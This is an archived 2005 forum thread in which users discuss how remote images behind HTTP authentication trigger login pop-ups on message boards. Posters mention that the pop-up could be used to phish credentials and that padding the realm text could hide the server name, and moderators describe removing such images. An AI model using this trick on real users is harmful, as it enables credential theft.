(DO NOT CLICK OK!) I found a major security flaw in many boards - Printable Version
-Shoutbox (https://shoutbox.menthix.net)
+-- Forum: MsgHelp Archive (/forumdisplay.php?fid=58)
+--- Forum: Skype & Technology (/forumdisplay.php?fid=9)
+---- Forum: Tech Talk (/forumdisplay.php?fid=17)
+----- Thread: (DO NOT CLICK OK!) I found a major security flaw in many boards (/showthread.php?tid=43637)
(DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:34 PM
Well I was using the official Playstation forums and someone asked me how to put an image in their signature.
I told them to use (yes - the PS forums allow html):
<img src="http://www.externalserver.com/folder/image.extension">
He, being a newbie, thought I meant to use that EXACT code. He put it in and now a java pop-up appears whenever a page with that tag is viewed 
.
It appears to work here, too, using the [img] tags.
[img]http://www.externalserver.com/folder/image.extension[/img] (Edited by WDZ)
This has been test on:
Lithium (PS forums)
Mybb (these forums).
WDZ - if you get a chance you might want to fix this on the Plus! forums 
Chris Boulton - you may want to fix this for everyone else.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-25-2005 at 06:38 PM
quote:Uhh... it just looks like a standard HTTP login prompt... not that unusual... I've seen it here a number of times. The mods just remove any image that requires a login.
Originally posted by blade
He put it in and now a java pop-up appears whenever a page with that tag is viewed
There's really no way to prevent such images from being linked to.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-25-2005 at 06:39 PM
I think this is somewhat impossible to fix. However this does not cause any harm (I think), but some annoying. 
Edit: Ok, unless it says, you need to log in to the board again 
/sdoh
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:42 PM
Well some newbies could click "ok" and be redirected to the site's homepage or something. It's a very up-front way of someone advertising.
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts 
).
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Millenium_edition on 04-25-2005 at 06:46 PM
quote:actually, it can't... if you need permission to view those, that popup will also appear.
Originally posted by blade
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Anubis on 04-25-2005 at 06:48 PM
quote:They still need login :/
Originally posted by blade
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that
quote:Apart from the obvious sniffing any provider that does them out and banning hotlinking to their site from here, wouldn't work though, one would always be missed, although it could act as "damage limitation" and decrease the odds of it happening
Originally posted by WDZ
There's really no way to prevent such images from being linked to.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-25-2005 at 06:49 PM
quote:Uhhm... no.
Originally posted by blade
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts
Click: http://shoutbox.menthix.net/images/auth.jpg
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:49 PM
quote:
Originally posted by WDZ
quote:Uhhm... no.
Originally posted by blade
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts
Click: http://shoutbox.menthix.net/images/auth.jpg
Well it's your choice I guess
And ya - I forgot about protected images
(and
2u2)
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Anubis on 04-25-2005 at 06:53 PM
quote:
Originally posted by blade
Well it's your choice I guess
He said "Uhhm...No" because it wouldn't work, not because it's his choice.
You need authorisation for the server, and any file on the server. Doesn't matter if it's a .exe or .gif. You need a username and password
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:55 PM
quote:
Originally posted by Anubis
He said "Uhhm...No" because it wouldn't work, not because it's his choice.
I know, but there are other things he could do
(blacklist servers for one)quote:
Originally posted by Anubis
You need authorisation for the server, and any file on the server. Doesn't matter if it's a .exe or .gif. You need a username and password
I know - I forgot
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Millenium_edition on 04-25-2005 at 07:03 PM
quote:do you have any idea about how big the internet really is? ¬¬
Originally posted by blade
<blacklist>
edit:
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-25-2005 at 07:05 PM
quote:
Originally posted by blade
Well some newbies could click "ok" and be redirected to the site's homepage or something. It's a very up-front way of someone advertising.
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts
A very simple http-policy could redirect that internally (no aparent url change) to a script that could easily read everyithing you put into the fields.
Care to say any try of tricking people into this should be considered as a try to hack the board and a permanent ban should be reasonable
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 07:12 PM
quote:
Originally posted by KeyStorm
Care to say any try of tricking people into this should be considered as a try to hack the board and a permanent ban should be reasonable
Hahaha - good call.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by saralk on 04-26-2005 at 05:35 PM
i guess it could be used in a very dodgy way, by making people think that they need to enter their username and password again.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-26-2005 at 05:56 PM
quote:Yeah, but at least the prompt tells you what server you'd be sending the data to.
Originally posted by saralk
i guess it could be used in a very dodgy way, by making people think that they need to enter their username and password again.
Of course, some people without much web knowledge/experience could be fooled.We'll simply remove any image that requires a login, as there is no way to stop them from being used in the [img] tags.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by John Anderton on 04-26-2005 at 07:19 PM
quote:I have that exact same script .... well thats what i use to protect my private pic gallery
Originally posted by WDZ
Click: http://shoutbox.menthix.net/images/auth.jpg
Whats a username and password that will actually work there dz ?
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-26-2005 at 07:24 PM
quote:
Originally posted by WDZ
quote:Yeah, but at least the prompt tells you what server you'd be sending the data to.
Originally posted by saralk
i guess it could be used in a very dodgy way, by making people think that they need to enter their username and password again.
We'll simply remove any image that requires a login, as there is no way to stop them from being used in the [img] tags.
Oh, noes, DZ, the Auth Realm can be freely set to anything you want. So there's no way to know where it comes from. Actually, you can't tell what image caused it, unless you try them separately.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-26-2005 at 07:28 PM
quote:
Originally posted by John Anderton
I have that exact same script
No you don't... it's just a standard HTTP login prompt.quote:There isn't one... it's only an example.
Whats a username and password that will actually work there dz ?
quote:Well, Opera shows me the server name (msghelp.net) in addition to the realm. Other browsers don't?
Originally posted by KeyStorm
Oh, noes, DZ, the Auth Realm can be freely set to anything you want.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by John Anderton on 04-26-2005 at 07:43 PM
quote:I tht it was an acutal script
Originally posted by WDZ
No you don't... it's just a standard HTTP login prompt.
I was too lazy to read the whole thread 
I was refering to a php script that asks u a name and pw and only access to a file in which it was included when both are correct.
quote:Same answer as above ..... ur dodgy
Originally posted by WDZ
There isn't one... it's only an example.
quote:Firefox does
Originally posted by WDZ
Well, Opera shows me the server name (msghelp.net) in addition to the realm. Other browsers don't?
It saysquote:
Originally posted by Dz's dodgy script (http login prompt)
Enter username and password for "Oh noes!!!" at http://shoutbox.menthix.net
And behind the page says :refuck:
U could have atleast taken the liberty of putting the actual image there
<img src="http://shoutbox.menthix.net/images/smilies/refuck.gif" alt="Refuck Emote"></img>
* John Anderton is sleepy and just hopes there arent any typo's there ....
if there are correct em ur self ...
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-26-2005 at 08:08 PM
Ok, instead of "Oh noes!!" put
code:
"Oh noes!!
"
or
code:
"Oh noes!!! "
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by John Anderton on 04-27-2005 at 11:46 AM
quote:Sorry i miss the point .... why ?? what difference does that make KS ??
Originally posted by KeyStorm
Ok, instead of "Oh noes!!" put
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Guido on 04-27-2005 at 03:12 PM
quote:That it might hide the real URL in the alert popup.
Originally posted by John Anderton
quote:Sorry i miss the point .... why ?? what difference does that make KS ??
Originally posted by KeyStorm
Ok, instead of "Oh noes!!" put
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-27-2005 at 03:13 PM
I'd hope that browser developers would think of that and limit the length and/or trim whitespace...
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Guido on 04-27-2005 at 03:17 PM
quote:Sometimes yes, sometimes no.
Originally posted by WDZ
I'd hope that browser developers would think of that and limit the length and/or trim whitespace...
Probably not with whitespace, but I've seen lots of times other stuff being used to lengthen the name artificially... such as "OH NOES! CLICK OK TO CONTINUE THIS IS A SAFE PAGE. YOU CAN WIN MONEY IF YOU CLICK NEXT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! WDZ IS DA LAZYN355!" ETC.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Concord Dawn on 04-27-2005 at 04:20 PM
quote:
Originally posted by Guido
quote:Sometimes yes, sometimes no.
Originally posted by WDZ
I'd hope that browser developers would think of that and limit the length and/or trim whitespace...
Probably not with whitespace, but I've seen lots of times other stuff being used to lengthen the name artificially... such as "OH NOES! CLICK OK TO CONTINUE THIS IS A SAFE PAGE. YOU CAN WIN MONEY IF YOU CLICK NEXT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! WDZ IS DA LAZYN355!" ETC.
How about kjust doing as KeyStorm said? Permanently banning all users that try that?
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Guido on 04-27-2005 at 06:50 PM
quote:Which is exactly what is being done currently. Not banning, since it was never made as a form of span, more like a mistake, but if it is used as an intent of spamming, be sure it will be taken care of.
Originally posted by Chaotic_Shield
How about kjust doing as KeyStorm said? Permanently banning all users that try that?